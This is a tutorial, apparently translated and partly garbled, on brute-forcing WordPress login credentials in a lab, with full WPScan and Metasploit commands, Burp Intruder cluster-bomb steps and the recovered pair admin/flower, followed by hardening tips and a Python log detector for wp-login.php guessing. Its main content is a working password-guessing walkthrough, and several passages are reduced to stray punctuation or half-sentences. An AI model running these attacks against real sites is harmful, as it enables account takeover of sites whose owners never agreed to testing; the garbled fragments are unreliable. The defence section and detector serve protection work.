In this article, you will learn how to hack WordPress site credentials using various brute force attacks.
Content:
- Prerequisites
- WPscan
- Metasploit
- Burp Suite
- How to secure a site from brute force?
Prerequisites
- A website powered by WordPress. Here we use our own penetration-testing lab, which we built in our previous post.
- Kali Linux (WPscan). WPScan , Kali Linux .
- Burp Suite (Intruder).
WPscan
WPscan is a WordPress vulnerability scanner, the classic «black box» scanner for WordPress. WPscan ships with Kali Linux.
WordPress, .
:
As the password list we take rockyou.txt, which ships with Kali Linux and contains 14 341 564 entries.
wpscan --url http://192.168.1.100/wordpress/ -U users.txt -P /usr/share/wordlists/rockyou.txt
- --url – the URL of the target WordPress site.
- -U – the list of user names, users.txt
- -P – the password list, rockyou.txt
The scan finds the valid pair admin / flower.
Metasploit
Metasploit is preinstalled in Kali Linux. It has a module for brute-forcing the WordPress login. Start msfconsole and run the commands below.
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.100
msf auxiliary(wordpress_login_enum) > set targeturi /wordpress
msf auxiliary(wordpress_login_enum) > set user_file user.txt
msf auxiliary(wordpress_login_enum) > set pass_file pass.txt
msf auxiliary(wordpress_login_enum) > exploit
When the module finishes, it reports the found credentials:
- Username: admin
- Password: flower
Burp Suite
Kali ships Burp Suite Community Edition. Burp Suite can also brute-force the WordPress login. Turn on Burp Proxy and open the WordPress login page in the browser.
Submit the form with dummy credentials, raj : raj, and intercept the request in the proxy. Send it to Intruder with Ctrl + I or Send to Intruder.
Intruder marks candidate payload positions with §. Clear all of them, then select the username value and the password value and click Add for each, so that only these two positions are marked.
With two positions, choose the cluster bomb attack type: it tries every combination of the two payload sets. So with 1000 user names and 1000 passwords it will make 1 000 000 requests.
On the Payloads tab configure payload sets 1 and 2. For set 1 add the user names with Add.
For set 2 choose Runtime file and point it at the password wordlist. Then click Start attack.
When the attack finishes, sort the results by status and length: the request with admin and flower returns status 302 and length 1203, unlike all the others. So the valid credentials are admin / flower – the login succeeded and the server redirected.
How to secure a site from brute force?
, , :
Use a password of 8-16 characters. Do not use dictionary words.
Make it contain:
- uppercase letters (A)
- lowercase letters (a)
100%, .
Limit login attempts: after several failed logins, temporarily block the IP address they came from.
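A defender-side complement to the lockout advice above, added here as an example that is not part of the original article: it scans web-server access logs for bursts of failed POSTs to wp-login.php from one IP, and flags whether a 302 (the success indicator seen in the Burp results) followed the burst. The log lines are constructed, and the 200-means-failed / 302-means-success heuristic is an assumption about a default WordPress login form.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-log lines (not real traffic): five failed guesses
# that re-render the form (200), then one guess that redirects (302).
SAMPLE_LOG = "\n".join(
    [f'192.168.1.50 - - [10/Oct/2023:10:00:{s:02d} +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 4521 "-" "WPScan v3"'
     for s in range(5)]
    + ['192.168.1.50 - - [10/Oct/2023:10:00:06 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 1203 "-" "WPScan v3"',
       '10.0.0.7 - - [10/Oct/2023:10:00:03 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 1203 "-" "Mozilla/5.0"',
       '10.0.0.7 - - [10/Oct/2023:10:01:00 +0000] "GET /wordpress/wp-admin/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"'])

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Parse one combined-log line; returns None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "method": m["method"], "path": m["path"], "status": int(m["status"]),
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")}

def detect_login_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag IPs with at least `threshold` failed wp-login.php POSTs inside `window_seconds`.
    Returns {ip: {"failed": failures_in_window, "succeeded_after": bool}}."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].endswith("/wp-login.php"):
            attempts[rec["ip"]].append((rec["ts"], rec["status"]))
    findings = {}
    for ip, evs in attempts.items():
        evs.sort()
        failed = [ts for ts, st in evs if st == 200]  # assumption: failed login re-renders form with 200
        best, window_end = 0, None
        for i, start in enumerate(failed):
            # densest window of failures starting at this attempt
            n = sum(1 for ts in failed[i:] if (ts - start).total_seconds() <= window_seconds)
            if n > best:
                best, window_end = n, failed[i + n - 1]
        if best >= threshold:
            # a 302 after the burst means a guess worked: escalate, not just block
            succeeded = any(st == 302 and ts > window_end for ts, st in evs)
            findings[ip] = {"failed": best, "succeeded_after": succeeded}
    return findings

if __name__ == "__main__":
    for ip, info in detect_login_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```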
Enable two-factor authentication (2FA).
Captcha
WordPress , , . .
WordPress
. , , .
CDN
A CDN (Content Delivery Network) sits in front of the site and filters traffic before it reaches WordPress. Popular CDNs include:
- Cloudflare
- Jetpack
- Swarmify
- Amazon CloudFront (1 )
- Incapsula
- jsDelivr
. . WordPress, .
WordPress.